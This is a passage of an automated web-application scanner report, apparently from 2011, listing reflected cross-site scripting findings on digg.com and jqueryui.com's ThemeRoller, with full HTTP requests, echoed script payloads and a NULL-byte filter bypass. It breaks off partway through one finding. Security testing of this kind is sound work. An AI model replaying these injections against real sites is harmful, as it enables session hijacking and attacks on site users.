<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%0034ebf"><script>alert(1)</script>07ed2e5f09b?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx.rss">
...[SNIP]...

2.23. http://digg.com/topic [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /topic

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006361e"><script>alert(1)</script>13807bfb062 was submitted in the REST URL parameter 1. This input was echoed as 6361e"><script>alert(1)</script>13807bfb062 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /topic%006361e"><script>alert(1)</script>13807bfb062 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=220732 10.2.130.26
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18112

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/topic%006361e"><script>alert(1)</script>13807bfb062.rss">
...[SNIP]...

2.24. http://digg.com/upcoming [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /upcoming

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d52d9"><script>alert(1)</script>0f1d8b4e8f1 was submitted in the REST URL parameter 1. This input was echoed as d52d9"><script>alert(1)</script>0f1d8b4e8f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /upcoming%00d52d9"><script>alert(1)</script>0f1d8b4e8f1 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=193751 10.2.130.26
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18118

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/upcoming%00d52d9"><script>alert(1)</script>0f1d8b4e8f1.rss">
...[SNIP]...

2.25. http://jqueryui.com/themeroller/ [bgColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50e92"><script>alert(1)</script>67aee4135f0 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada50e92"><script>alert(1)</script>67aee4135f0&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada50e92"><script>alert(1)</script>67aee4135f0&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighligh
...[SNIP]...

2.26. http://jqueryui.com/themeroller/ [bgColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62918"><script>alert(1)</script>0f9411eb6e5 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=00000062918"><script>alert(1)</script>0f9411eb6e5&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
l&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=00000062918"><script>alert(1)</script>0f9411eb6e5&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=
...[SNIP]...

2.27. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0998"><script>alert(1)</script>a72e36b6181 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8Fa0998"><script>alert(1)</script>a72e36b6181&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8Fa0998"><script>alert(1)</script>a72e36b6181&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHo
...[SNIP]...

2.28. http://jqueryui.com/themeroller/ [bgColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be25c"><script>alert(1)</script>a29993d1aed was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ecbe25c"><script>alert(1)</script>a29993d1aed&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
0000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ecbe25c"><script>alert(1)</script>a29993d1aed&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverl
...[SNIP]...

2.29. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca387"><script>alert(1)</script>d58ea5446de was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadadaca387"><script>alert(1)</script>d58ea5446de&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadadaca387"><script>alert(1)</script>d58ea5446de&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&bo
...[SNIP]...

2.30. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7fa2"><script>alert(1)</script>ef87dfaa078 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9eee7fa2"><script>alert(1)</script>ef87dfaa078&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ver=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9eee7fa2"><script>alert(1)</script>ef87dfaa078&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError
...[SNIP]...

2.31. http://jqueryui.com/themeroller/ [bgColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbcfa"><script>alert(1)</script>b9131c7690b was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadadafbcfa"><script>alert(1)</script>b9131c7690b&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadadafbcfa"><script>alert(1)</script>b9131c7690b&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&
...[SNIP]...

2.32. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6d67"><script>alert(1)</script>7e0b5c6406d was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaae6d67"><script>alert(1)</script>7e0b5c6406d&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaae6d67"><script>alert(1)</script>7e0b5c6406d&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

2.33. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c7b8"><script>alert(1)</script>81f4ae42993 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

